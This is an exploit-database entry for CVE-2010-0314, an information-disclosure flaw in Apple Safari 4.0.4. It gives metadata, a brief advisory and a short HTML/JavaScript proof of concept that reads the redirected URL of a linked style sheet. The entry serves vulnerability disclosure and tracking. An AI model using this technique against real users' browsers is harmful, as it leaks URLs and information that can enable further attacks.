Apple Safari 4.0.4 - Style Sheet redirection Information Disclosure

Author: Cesar Cerrudo
type: remote
platform: windows
port: 
date_added: 2010-01-09  
date_updated: 2014-05-29  
verified: 1  
codes: CVE-2010-0314;OSVDB-61793  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 33563.txt  
source: https://www.securityfocus.com/bid/37925/info

Apple Safari is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.

<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>